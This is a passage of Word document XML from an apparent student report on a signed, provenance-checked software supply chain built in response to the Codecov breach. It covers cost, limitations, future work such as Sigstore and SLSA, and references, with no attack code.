        <w:t>The design follows the direction the industry took after Codecov and SolarWinds. US Executive Order 14028 (May 2021) [17] required secure software development practices and provenance for software sold to the government. NIST's Secure Software Development Framework (SP 800-218) [9] recommends protecting release integrity with signatures and archiving provenance. The OpenSSF SLSA framework [10] defines provenance levels. Sigstore [11] and in-toto [13] provide signing and attestation infrastructure now used by major package ecosystems. The prototype implements these ideas at a scale suitable for undergraduate study, and its interfaces (a signing service, a trust policy, a gate with exit codes) map directly onto these production tools.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.4 Cost and Feasibility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Software cost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: zero; everything uses open-source libraries (PyCA cryptography, OpenSSL, SQLite).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Runtime cost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: about 2.2 ms per verification for the uploader, and tens of milliseconds for a 10 MB artifact.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Operational cost</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: a cloud KMS or HSM key for signing (low monthly cost per key on major clouds), a key-management procedure and one gate step in each customer pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Adoption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: customers add one command to their pipeline. The vendor adds signing to its release job and publishes the root key fingerprint once.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>8.5 Relevance to Other Incidents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The same mechanism is relevant wherever distributed code is modified after release, for example compromised package mirrors, CDN-hosted scripts and self-updating agents. It is honest to note its boundary. In SolarWinds (2020) the malicious code was inserted during the vendor's build and then signed legitimately [20]; in the xz-utils backdoor (2024, CVE-2024-3094) [19] malicious content was present in release tarballs that differed from the public source repository. Signatures alone cannot stop such cases, which is why this design adds build provenance (source hash, builder identity) and security testing, and why future work targets reproducible builds and public transparency logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 9</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CONCLUSION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The Codecov incident showed that a single leaked storage credential, combined with customers running an unverified script inside privileged CI environments, can expose secrets across thousands of organisations for months, even when every download uses HTTPS. The root problem was the absence of mandatory, automatic verification of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>both</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> integrity and authenticity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>This work designed and implemented a Cryptographically Verified Software Supply Chain that closes that gap. SHA-256 fingerprints and Ed25519 signatures bind every artifact to a signed manifest and provenance. A signing service with RBAC and MFA protects the release keys. A root-signed trust policy handles rotation, revocation and anti-replay. TLS 1.3 protects distribution, a fail-closed CI/CD gate enforces ten checks, and a hash-chained audit log provides accountability. The prototype blocked every simulated attack: the original one-line modification, forged manifests, attacker and impersonated keys, a stolen key, replayed and revoked versions, and a compromised registry. It accepted all legitimate releases, with zero false acceptances over 1,000 tampered samples and millisecond-level overhead.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>9.1 Limitations</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A stolen but not-yet-revoked key can produce valid signatures; the content scan is a heuristic and can be evaded by obfuscation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The system proves who built an artifact, not that the source code is benign.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Private keys are held in an encrypted software key store rather than an HSM or cloud KMS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The audit log is local to the vendor; it is not yet a public, independently monitored transparency log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Release signing requires a single approver; there is no threshold (m-of-n) approval.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>9.2 Future Work</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Integrate Sigstore/cosign keyless signing with OIDC identities and the Rekor transparency log.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Generate SLSA Level 3 provenance on a hosted, isolated builder and support reproducible builds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Require threshold signatures (for example 2-of-3 release managers) for production releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Sign and verify SBOMs (CycloneDX/SPDX) and gate on dependency vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="90"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Add a cloud-KMS or HSM backend behind the existing SigningService interface, and package the gate as a reusable GitHub Action.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 10</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>REFERENCES</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[1]  Codecov, "Bash Uploader Security Update," Apr. 15, 2021 (updated). [Online]. Available: https://about.codecov.io/security-update/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[2]  J. Menn and R. Satter, "Codecov hackers breached hundreds of restricted customer sites - sources," Reuters, Apr. 19, 2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[3]  HashiCorp, "HCSEC-2021-12 - Codecov Security Event and HashiCorp GPG Key Exposure," HashiCorp Discuss security bulletin, Apr. 2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[4]  National Institute of Standards and Technology, "Secure Hash Standard (SHS)," FIPS PUB 180-4, Aug. 2015.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[5]  S. Josefsson and I. Liusvaara, "Edwards-Curve Digital Signature Algorithm (EdDSA)," IETF RFC 8032, Jan. 2017.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[6]  National Institute of Standards and Technology, "Digital Signature Standard (DSS)," FIPS PUB 186-5, Feb. 2023.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[7]  E. Rescorla, "The Transport Layer Security (TLS) Protocol Version 1.3," IETF RFC 8446, Aug. 2018.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[8]  E. Barker, "Recommendation for Key Management: Part 1 - General," NIST SP 800-57 Part 1 Rev. 5, May 2020.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[9]  M. Souppaya, K. Scarfone and D. Dodson, "Secure Software Development Framework (SSDF) Version 1.1," NIST SP 800-218, Feb. 2022.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[10]  Open Source Security Foundation, "Supply-chain Levels for Software Artifacts (SLSA) Specification v1.0," Apr. 2023. [Online]. Available: https://slsa.dev/spec/v1.0/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[11]  Z. Newman, J. S. Meyers and S. Torres-Arias, "Sigstore: Software Signing for Everybody," in Proc. ACM SIGSAC Conf. Computer and Communications Security (CCS), 2022, pp. 2353-2367.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[12]  J. Samuel, N. Mathewson, J. Cappos and R. Dingledine, "Survivable Key Compromise in Software Update Systems," in Proc. 17th ACM Conf. Computer and Communications Security (CCS), 2010, pp. 61-72.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[13]  S. Torres-Arias, H. Afzali, T. K. Kuppusamy, R. Curtmola and J. Cappos, "in-toto: Providing farm-to-table guarantees for bits and bytes," in Proc. 28th USENIX Security Symposium, 2019, pp. 1393-1410.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[14]  A. Shostack, Threat Modeling: Designing for Security. Indianapolis, IN, USA: Wiley, 2014.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[15]  D. M'Raihi, S. Machani, M. Pei and J. Rydell, "TOTP: Time-Based One-Time Password Algorithm," IETF RFC 6238, May 2011.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[16]  B. Laurie, A. Langley and E. Kasper, "Certificate Transparency," IETF RFC 6962, Jun. 2013.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[17]  Executive Office of the President, "Executive Order 14028: Improving the Nation's Cybersecurity," Federal Register, vol. 86, no. 93, May 12, 2021.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[18]  Python Cryptographic Authority, "cryptography" library documentation. [Online]. Available: https://cryptography.io/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[19]  National Vulnerability Database, "CVE-2024-3094 (xz-utils backdoor)," NIST, Mar. 2024. [Online]. Available: https://nvd.nist.gov/vuln/detail/CVE-2024-3094</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="510" w:hanging="510"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[20]  Cybersecurity and Infrastructure Security Agency, "Emergency Directive 21-01: Mitigate SolarWinds Orion Code Compromise," Dec. 2020.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Project source code, diagrams and results: repository folder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
